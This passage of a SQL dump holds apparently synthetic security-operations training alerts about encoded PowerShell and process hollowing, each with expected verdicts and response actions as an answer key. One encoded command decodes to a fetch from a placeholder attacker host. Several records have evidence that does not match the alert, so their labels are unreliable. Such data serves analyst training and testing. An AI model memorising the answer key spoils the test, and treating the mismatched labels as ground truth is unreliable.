detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1727, 'PowerShell Download Cradle Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed using a download cradle. The script was encoded and executed on an internal host.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:20:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.22\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address detected in PowerShell execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command suggests malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell encoded command and contact with a malicious IP confirm a malware attack.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1728, 'Process Hollowing Detected in Explorer.exe', 'critical', 'SentinelOne', 'Process hollowing detected in explorer.exe, indicating possible code injection to hide malicious activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER01\",\"command_line\":\"explorer.exe /inject\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process hollowing\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"explorer.exe /inject\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing in explorer.exe indicates a high-risk malware infiltration.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe 
/inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1729, 'Suspicious PowerShell Execution Detected', 'medium', 'Sysmon', 'An internal system executed a PowerShell script using an encoded command, potentially indicating malicious intent.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"bsmith\",\"hostname\":\"WORKSTATION-01\",\"command_line\":\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing a PowerShell script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command decoded to benign PowerShell script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command is benign and not indicative of malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand 
cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1730, 'Unauthorized PowerShell Script Execution', 'high', 'Carbon Black', 'Detected execution of an unauthorized PowerShell script with an encoded command targeting an external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:05:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.40\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP01\",\"command_line\":\"powershell -EncodedCommand d2hvYW1pIQ==\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in unauthorized script execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand d2hvYW1pIQ==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command matched with known malicious patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with contact to a known malicious IP indicates an active threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1731, 'Potential Process Hollowing in Explorer.exe', 'medium', 'Sysmon', 'Process hollowing detected in explorer.exe, but further analysis suggests it may not be malicious.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:22:58Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"INTERNAL-PC02\",\"command_line\":\"explorer.exe /loadlibrary\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process execution\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not associated with any known malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"explorer.exe /loadlibrary\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Usage of loadlibrary is uncommon but not necessarily malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process hollowing alert in explorer.exe is likely a false positive due to clean file hash.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe 
/loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1732, 'Encoded PowerShell Command Execution', 'high', 'CrowdStrike', 'A PowerShell script with an encoded command was executed on an internal host, potentially communicating with an external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:11:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"203.0.113.40\",\"username\":\"mwhite\",\"hostname\":\"INTERNAL-WORKSTATION03\",\"command_line\":\"powershell -EncodedCommand c2VjcmV0IG1lc3NhZ2U=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing suspicious encoded PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for hosting malicious scripts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand c2VjcmV0IG1lc3NhZ2U=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicates malicious use\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of an encoded PowerShell command with external communication suggests a malware infection.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1733, 'PowerShell Execution with External IP Contact', 'high', 'SentinelOne', 'Encoded PowerShell executed on an internal host with communication to a known malicious external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:15:53Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"198.51.100.50\",\"username\":\"jdoe\",\"hostname\":\"LAPTOP-USER01\",\"command_line\":\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP executing potentially malicious PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for malicious activities multiple times\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand 